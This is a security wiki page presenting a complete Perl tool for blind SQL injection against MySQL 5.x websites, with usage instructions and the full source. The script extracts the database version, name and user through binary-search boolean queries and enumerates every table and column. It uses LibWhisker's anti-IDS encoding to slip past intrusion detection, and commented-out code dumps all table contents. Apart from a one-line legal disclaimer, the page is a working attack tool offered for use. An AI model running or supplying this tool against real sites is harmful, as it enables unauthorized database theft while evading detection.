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SQL injection/mysqli-blindutils/
From NetSec
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- Main article: mysqli-blindutils
Special thanks to hatter for his contributions to this article.
- Main article: Web exploitation tools
The syntax of this script is:
perl -h [hostname] -u [url] [-q [query]]
perl -h -u -q "select system_user()"
- By default, this script will first determine username, version and database name before enumerating the information_schema information.
- When the -q flag is applied, a user can supply any query that returns only a single cell
- If the exploit or vulnerability requires a single quote, simply tack %27 to the end of the URI.
- This script contains error detection : It will only work on a mysql 5.x database, and knows when its queries have syntax errors.
- This script uses perl's LibWhisker2 for IDS Evasion (The same as Nikto).
- This script uses the MD5 algorithm for optimization. There are other optimization methods, and this may not work on all sites.
The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act. |
#!/usr/bin/perl use strict; use Getopt::Std; use Digest::MD5 qw(md5_hex); use LW2; my %options = (); getopts("u:h:q:", \%options); my $url = $options{u}; # Vuln URL my $host = $options{h}; # Needs this for libwhisker # Format. my $count = 0; if (my $q = $options{q}) { $q =~ s/\ /%20/g; my ($cxr, $result) = runQuery($url,$host,$q); print "Query Result:\n\t$result\nCalculated in $cxr requests.\n"; exit(1); } # Get the Database Version my $query = "SELECT%20VERSION()"; my ($tmp, $version) = runQuery($url, $host, $query); $count += $tmp; $count += 2; print "\nDatabase Version:\t\t$version\nIn $count requests.\n\n"; # Get the Database Name $query = "SELECT%20DATABASE()"; my ($tmp,$answer) = runQuery($url, $host, $query); print "Database Name:\t\t$answer\nIn $tmp requests.\n\n"; # Get the Database Username $query = "SELECT%20USER()"; my ($tmp,$answer) = runQuery($url, $host, $query); print "Database User:\t\t$answer\nIn $tmp requests.\n\n"; if ($version =~ /5\./g) { print "Enumerating Database Spec:\n"; getSchema($url,$host); exit(1); } else { print "This is not MySQL v5.x, so I can't enumerate the schema tables!\n"; exit(1); } sub getSchema { my $url = shift; my $host = shift; my $query = "SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE())"; $query =~ s/ /%20/g; my ($c, $val) = runQuery($url,$host,$query); # $val = number of table names in the current database. for (my $i=0; $i < int($val); ++$i) { $query = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE()) LIMIT $i,1"; $query =~ s/ /%20/g; my ($q, $table) = runQuery($url,$host,$query); print "$table:\n"; # $table = table name $query = "SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; $query .= "(SELECT DATABASE()) LIMIT $i,1)"; $query =~ s/ /%20/g; my ($r, $fcount) = runQuery($url,$host,$query); # $fcount - number of columns in the table for (my $n = 0; $n < int($fcount); ++$n) { $query = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; $query .= "(SELECT DATABASE()) LIMIT $i,1) LIMIT $n,1"; $query =~ s/ /%20/g; my ($o, $field) = runQuery($url,$host,$query); print "\t$field\n"; # Uncomment the lines below to # scrape the entire database. # $query = "SELECT COUNT($field) FROM $table"; # $query =~ s/ /%20/g; # my ($r, $total) = runQuery($url,$host,$query); # for (my $cn = 0; $cn < $total; $cn++) # { # $query = "SELECT $field FROM $table LIMIT $cn,1"; # $query =~ s/ /%20/g; # my ($e, $data) = runQuery($url,$host,$query); # print "\t\t$data\n"; # } } } } sub runQuery { my $url = shift; my $host = shift; my $query = shift; my $qCount; my $qCH; my $pos = 1; my $floor = 0; # Bottom of ascii keyrange my $ceiling = 255; # Top of ascii keyrange my $spacer = "%20OR%20"; my $truth = "62=62/*"; my $lie = "88=98/*"; my ($true, $false) = makeTrueFalse($url, $spacer, $truth, $lie, $host); my $lenUri = "$url" . queryConstruct(0, 0, $spacer, $query); my ($qCH, $len) = getValue($lenUri, 64, 0, $true, $false, $host); $qCount += $qCH; my $results = ""; while (($pos < $len) || ($pos eq $len)) { my $uri = "$url" . queryConstruct(1, $pos, $spacer, $query); #construct the actual URI my ($qCH, $value) = getValue($uri, $ceiling, $floor, $true, $false, $host); $qCount += $qCH; my $char = chr("$value"); $results .= $char; ++$pos; } return ($qCount, $results); } #Logrithm sub getValue { my $uri = shift; my $ceiling = shift; my $floor = shift; my $true = shift; my $false = shift; my $host = shift; my $nextmaybe; my $target; my $qCount = 0; my $maybe = int($ceiling/2); # Get the middle of the total possible range of values while (not defined $target) { if (isGT($uri, $maybe, $host) eq $true) { ++$qCount; $floor = $maybe; $nextmaybe = int($maybe + (($ceiling - $floor)/2)); } elsif (isLT($uri, $maybe, $host) eq $true) { ++$qCount; $ceiling = $maybe; $nextmaybe = int($maybe - (($ceiling - $floor)/2)); } elsif (isEQ($uri, $maybe, $host) eq $true) { ++$qCount; $target = $maybe; return ($qCount, $target); } $maybe = $nextmaybe; if (($maybe eq "") || (!$maybe) || (not defined $maybe)) { print "SQL Error caught! Aborting!\n"; print "At least 3 queries in error log!\n"; exit(1); } } } # Is greater than? sub isGT { my $uri = shift; my $guess = shift; my $host = shift; return (md5_hex(download("$uri>$guess)/*", $host))); } # Is less than? sub isLT { my $uri = shift; my $guess = shift; my $host = shift; return (md5_hex(download("$uri<$guess)/*", $host))); } # Is equal to? sub isEQ { my $uri = shift; my $guess = shift; my $host = shift; return (md5_hex(download("$uri=$guess)/*", $host))); } # Ripped off from an older version of the scanner sub download { my $uri = shift; my $try = 5; my $host = shift; my %request; my %response; LW2::http_init_request(\%request); $request{'whisker'}->{'method'} = "GET"; $request{'whisker'}->{'host'} = $host; $request{'whisker'}->{'uri'} = $uri; $request{'whisker'}->{'encode_anti_ids'} = 962; $request{'whisker'}->{'user-agent'} = "wget"; LW2::http_fixup_request(\%request); if(LW2::http_do_request(\%request, \%response)) { if($try < 5) { print "Failed to fetch $uri on try $try. Retrying...\n"; return undef if(!download($uri, $try++)); } print "Failed to fetch $uri.\n"; return undef; } else { return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'}); } } sub queryConstruct { my $type = shift; my $pos = shift; my $spacer = shift; my $query = shift; if ($type eq 0) # Len { my $newQuery = "LENGTH(($query))"; my $padding = "("; my $ender = ""; return ("$spacer$padding$newQuery$ender"); } elsif ($type eq 1) # String { my $padding = "((ASCII((LOWER((MID(("; # Begin query construct my $ender = "),$pos,1))))))"; # End query Construct return ("$spacer$padding$query$ender"); #construct the actual query } } sub makeTrueFalse { my $url = shift; my $spacer = shift; my $truth = shift; my $lie = shift; my $host = shift; my $trueMD = md5_hex(download("$url$spacer$truth", $host)); my $falsMD = md5_hex(download("$url$spacer$lie", $host)); # returns true, false return ($trueMD, $falsMD); } |
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